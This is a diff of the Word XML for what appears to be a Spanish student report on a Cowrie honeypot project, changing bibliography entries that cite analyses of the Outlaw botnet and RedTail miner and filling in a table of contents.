         <w:t xml:space="preserve">OffSec Services Limited. (s. f.). Kali Linux. https://www.kali.org/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Análisis de la botnet Outlaw, identificada en los resultados.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="200" w:line="360"/>
+        <w:ind w:left="709" w:hanging="709"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Souza, C., Muñoz, A. y Ovalle, E. (2025, 29 de abril). Outlaw cybergang attacking targets worldwide. Securelist (Kaspersky). https://securelist.com/outlaw-botnet/116444/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Análisis del minero RedTail, identificado en los resultados.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="200" w:line="360"/>
+        <w:ind w:left="709" w:hanging="709"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Riley, R. (2024, 22 de mayo). Analysis of "redtail" file uploads to ICS honeypot, a multi-architecture coin miner [Guest Diary]. SANS Internet Storm Center. https://isc.sans.edu/diary/30950</w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/docs/Memoria_PIASIR_Diego_Perez_Fonterosa.docx
+++ b/docs/Memoria_PIASIR_Diego_Perez_Fonterosa.docx
@@ -597,67 +597,2469 @@
         <w:t xml:space="preserve">Índice de Contenidos</w:t>
       </w:r>
     </w:p>
-    <w:sdt>
-      <w:sdtPr>
-        <w:alias w:val="Índice"/>
-      </w:sdtPr>
-      <w:sdtContent>
-        <w:p>
-          <w:r>
-            <w:fldChar w:fldCharType="begin" w:dirty="true"/>
-            <w:instrText xml:space="preserve">TOC \h \o "1-3"</w:instrText>
-            <w:fldChar w:fldCharType="separate"/>
-          </w:r>
-        </w:p>
-        <w:p>
-          <w:r>
-            <w:fldChar w:fldCharType="end"/>
-          </w:r>
-        </w:p>
-      </w:sdtContent>
-    </w:sdt>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:jc w:val="left"/>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="120" w:line="276"/>
+        <w:ind w:left="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Resumen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	5</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="120" w:line="276"/>
+        <w:ind w:left="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Justificación del Proyecto</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">[Nota: actualizar el índice en Word con clic derecho → Actualizar campo → Actualizar toda la tabla]</w:t>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Motivación</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Relación con los Módulos Profesionales</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Estado de la Cuestión</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	9</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Comparativa Razonada</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	10</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="120" w:line="276"/>
+        <w:ind w:left="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Introducción</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	12</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Evolución respecto al Anteproyecto</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	12</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Funciones Principales</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	13</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Requisitos del Sistema</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	13</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="120" w:line="276"/>
+        <w:ind w:left="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Objetivos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	15</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Objetivo General</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	15</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Objetivos Específicos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	15</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Desglose RFTP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	16</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="120" w:line="276"/>
+        <w:ind w:left="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Descripción del Sistema</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	19</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Arquitectura General</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	19</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Flujo de Datos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	19</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Seguridad y Aislamiento</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	20</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Casos de Uso</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	21</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="120" w:line="276"/>
+        <w:ind w:left="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Diseños</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	22</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Diagrama de Arquitectura de Red</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	22</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Diseño del Flujo de Datos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	23</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Diseño de Interfaces</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	24</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Diagrama de Red</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	25</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="120" w:line="276"/>
+        <w:ind w:left="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tecnología</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	27</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Cowrie</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	27</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
